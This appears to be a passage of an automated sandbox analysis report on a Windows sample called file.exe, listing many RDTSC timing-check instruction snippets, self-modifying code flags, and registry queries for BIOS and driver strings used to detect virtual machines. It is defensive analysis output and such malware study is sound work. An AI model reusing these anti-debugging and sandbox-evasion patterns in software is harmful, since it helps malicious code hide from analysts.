                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88413F second address: 884159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F51CCC6C593h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 884159 second address: 88415F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88415F second address: 884181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F51CCC6C592h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F51CCC6C588h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 884181 second address: 884191 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F51CD041DF6h 0x0000000a jnl 00007F51CD041DF6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 884191 second address: 884195 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 892F73 second address: 892F79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 892F79 second address: 892FAD instructions: 0x00000000 rdtsc 0x00000002 jns 00007F51CCC6C586h 0x00000008 je 00007F51CCC6C586h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 jmp 00007F51CCC6C594h 0x00000016 jmp 00007F51CCC6C58Eh 0x0000001b pop edi 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 892DE5 second address: 892DFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F51CD041DFAh 0x0000000d popad 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 892DFD second address: 892E08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F51CCC6C586h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 892E08 second address: 892E14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F51CD041DF6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 892E14 second address: 892E18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89B0F3 second address: 89B11C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CD041DFEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F51CD041E07h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89B11C second address: 89B13D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CCC6C58Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop edi 0x0000000f push edx 0x00000010 je 00007F51CCC6C586h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89B13D second address: 89B142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89B142 second address: 89B149 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89998D second address: 899992 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 899992 second address: 8999A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 ja 00007F51CCC6C594h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 899AF2 second address: 899AFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F51CD041DF6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 899AFE second address: 899B08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 899C53 second address: 899C89 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F51CD041DFFh 0x0000000d jbe 00007F51CD041DFCh 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push eax 0x00000018 pop eax 0x00000019 jnl 00007F51CD041DF6h 0x0000001f jl 00007F51CD041DF6h 0x00000025 popad 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 899C89 second address: 899CA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F51CCC6C586h 0x0000000a jmp 00007F51CCC6C58Fh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 899FAA second address: 899FAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 899FAE second address: 899FB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 899FB2 second address: 899FD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F51CD041E03h 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 899FD1 second address: 89A009 instructions: 0x00000000 rdtsc 0x00000002 je 00007F51CCC6C58Ch 0x00000008 push ecx 0x00000009 jmp 00007F51CCC6C590h 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F51CCC6C58Dh 0x00000019 jnp 00007F51CCC6C586h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89A009 second address: 89A00D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89A317 second address: 89A31B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89A31B second address: 89A325 instructions: 0x00000000 rdtsc 0x00000002 je 00007F51CD041DF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89A325 second address: 89A32B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89A32B second address: 89A343 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F51CD041E04h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89A343 second address: 89A347 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89ADB6 second address: 89ADCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F51CD041DF6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jne 00007F51CD041DF6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89C847 second address: 89C84C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89C84C second address: 89C878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F51CD041E00h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F51CD041E03h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89EFDD second address: 89EFE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89EFE3 second address: 89EFE9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A7548 second address: 8A7565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F51CCC6C599h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A7565 second address: 8A7581 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F51CD041E01h 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AEA5D second address: 8AEA66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ecx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AE8C4 second address: 8AE8E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F51CD041E0Eh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1D01 second address: 8B1D0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F51CCC6C586h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A99AC second address: 8A99B4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A99B4 second address: 8A99BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BE283 second address: 8BE29A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F51CD041DFEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D099D second address: 8D09CA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F51CCC6C58Eh 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F51CCC6C596h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CF731 second address: 8CF74C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CD041E07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CF887 second address: 8CF89B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F51CCC6C586h 0x0000000a popad 0x0000000b pushad 0x0000000c jnl 00007F51CCC6C586h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CFA06 second address: 8CFA0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CFA0B second address: 8CFA48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f pop edx 0x00000010 jmp 00007F51CCC6C58Dh 0x00000015 jmp 00007F51CCC6C58Ah 0x0000001a popad 0x0000001b pushad 0x0000001c jmp 00007F51CCC6C592h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CFA48 second address: 8CFA4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CFA4D second address: 8CFA53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CFA53 second address: 8CFA59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CFA59 second address: 8CFA7E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jg 00007F51CCC6C586h 0x0000000f jmp 00007F51CCC6C594h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CFD28 second address: 8CFD31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pop edi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CFD31 second address: 8CFD37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D034F second address: 8D0366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F51CD041DFCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D0366 second address: 8D036A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D036A second address: 8D0384 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CD041E06h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D0384 second address: 8D038A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D038A second address: 8D0390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D0390 second address: 8D03A8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F51CCC6C586h 0x00000008 jnc 00007F51CCC6C586h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push edi 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D03A8 second address: 8D03D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F51CD041DFEh 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F51CD041E09h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D03D6 second address: 8D03DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D03DA second address: 8D03E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D055A second address: 8D058A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jnc 00007F51CCC6C592h 0x0000000e push ecx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ecx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007F51CCC6C58Bh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D610E second address: 8D6139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jp 00007F51CD041DF6h 0x0000000c jmp 00007F51CD041E02h 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 jnc 00007F51CD041DF6h 0x0000001d pop esi 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D6420 second address: 8D6424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D6424 second address: 8D642A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D642A second address: 8D6496 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F51CCC6C58Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jno 00007F51CCC6C592h 0x00000011 nop 0x00000012 mov dl, 4Bh 0x00000014 push 00000004h 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 call 00007F51CCC6C588h 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 add dword ptr [esp+04h], 00000018h 0x0000002b inc eax 0x0000002c push eax 0x0000002d ret 0x0000002e pop eax 0x0000002f ret 0x00000030 mov dh, 55h 0x00000032 mov edx, dword ptr [ebp+122D375Ch] 0x00000038 call 00007F51CCC6C589h 0x0000003d jmp 00007F51CCC6C58Dh 0x00000042 push eax 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D6496 second address: 8D649A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D6769 second address: 8D676E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D676E second address: 8D67F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CD041E03h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F51CD041DF8h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 push dword ptr [ebp+1244C39Fh] 0x0000002c push 00000000h 0x0000002e push eax 0x0000002f call 00007F51CD041DF8h 0x00000034 pop eax 0x00000035 mov dword ptr [esp+04h], eax 0x00000039 add dword ptr [esp+04h], 00000014h 0x00000041 inc eax 0x00000042 push eax 0x00000043 ret 0x00000044 pop eax 0x00000045 ret 0x00000046 jmp 00007F51CD041E01h 0x0000004b call 00007F51CD041DF9h 0x00000050 push eax 0x00000051 push edx 0x00000052 jp 00007F51CD041DFCh 0x00000058 jp 00007F51CD041DF6h 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D67F7 second address: 8D680E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F51CCC6C593h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D680E second address: 8D6835 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CD041DFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F51CD041DFCh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F10487 second address: 4F10499 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F51CCC6C58Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F10499 second address: 4F1049D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F1049D second address: 4F104AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F104AC second address: 4F104C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CD041E05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F104C5 second address: 4F104CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F104CB second address: 4F104CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F104CF second address: 4F104D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F104D3 second address: 4F10559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007F51CD041DFFh 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F51CD041E02h 0x0000001a adc esi, 699FF8F8h 0x00000020 jmp 00007F51CD041DFBh 0x00000025 popfd 0x00000026 pushfd 0x00000027 jmp 00007F51CD041E08h 0x0000002c or si, 5358h 0x00000031 jmp 00007F51CD041DFBh 0x00000036 popfd 0x00000037 popad 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F51CD041E06h 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F105B4 second address: 4F105BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F105BA second address: 4F105EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CD041E03h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F51CD041E05h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F105EB second address: 4F10618 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CCC6C591h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F51CCC6C593h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F10618 second address: 4F1061E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F1061E second address: 4F1064B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop ebx 0x00000005 pushfd 0x00000006 jmp 00007F51CCC6C58Eh 0x0000000b add si, E0C8h 0x00000010 jmp 00007F51CCC6C58Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a pushad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 64D9B9 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7EBB54 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7EA65C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 8796B0 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7EA296 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
